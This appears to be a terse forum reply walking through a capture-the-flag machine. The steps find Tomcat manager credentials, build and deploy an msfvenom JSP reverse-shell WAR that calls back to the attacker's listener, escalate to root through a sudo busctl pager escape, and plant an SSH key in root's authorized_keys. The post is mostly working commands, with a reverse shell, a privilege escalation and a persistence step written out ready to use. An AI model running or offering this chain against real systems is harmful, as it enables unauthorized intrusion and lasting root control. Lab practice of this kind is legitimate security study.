same issue
Path:
ssh to the target and do a full enumeration. hint: search tomcat xml file really well
find the tomcatadm and pass
msfvenom -p java/jsp_shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f war > shell.war
curl -u ‘tomcatuser:passwrd_found_in_enum’ --upload-file shell.war “http:/target_ip:8080/manager/text/deploy?path=/shell”
start listener
`rlwrap nc -lvnp 4444’
navigate via browser to the /shell endpoint created
upgrade to a full interactive shell
sudo -l
sudo busctl tree org.freedesktop.systemd1
type ! and hit enter
now u are root; further u can echo ur id_rsa.pub into /root/.ssh/authorized_keys and than ssh as root.
find / -name “*flag*” 2>/dev/null
njoy the flags